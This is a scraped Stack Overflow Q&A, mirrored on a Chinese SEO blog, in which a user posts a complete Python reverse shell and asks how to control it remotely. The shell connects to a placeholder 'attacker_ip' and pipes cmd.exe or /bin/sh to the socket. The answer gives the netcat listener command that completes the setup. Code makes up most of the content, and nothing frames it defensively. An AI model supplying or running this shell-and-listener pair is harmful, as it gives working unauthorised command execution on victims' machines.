最新消息:雨落星辰是一个专注网站SEO优化、网站SEO诊断、搜索引擎研究、网络营销推广、网站策划运营及站长类的自媒体原创博客

python - Connect to reverse shell - Stack Overflow

programmeradmin2浏览0评论

I have reverse shell code in python:

#!/usr/bin/env python3

import socket, subprocess, os

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker_ip", attacker_port))

if os.name == 'nt':
    subprocess.call(["cmd.exe"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
else:
    subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())

I put IP address and port into the code.

But how to connect to this reverse shell from attacker machine?

EDIT: in the end I need to be able to run commands remotely.

I have reverse shell code in python:

#!/usr/bin/env python3

import socket, subprocess, os

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker_ip", attacker_port))

if os.name == 'nt':
    subprocess.call(["cmd.exe"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
else:
    subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())

I put IP address and port into the code.

But how to connect to this reverse shell from attacker machine?

EDIT: in the end I need to be able to run commands remotely.

Share Improve this question edited Jan 19 at 22:11 pbies asked Jan 17 at 22:24 pbiespbies 75214 silver badges30 bronze badges
Add a comment  | 

1 Answer 1

Reset to default 1

Seems like it is very easy in bash:

#!/usr/bin/env bash
nc -lvnp port_number
发布评论

评论列表(0)

  1. 暂无评论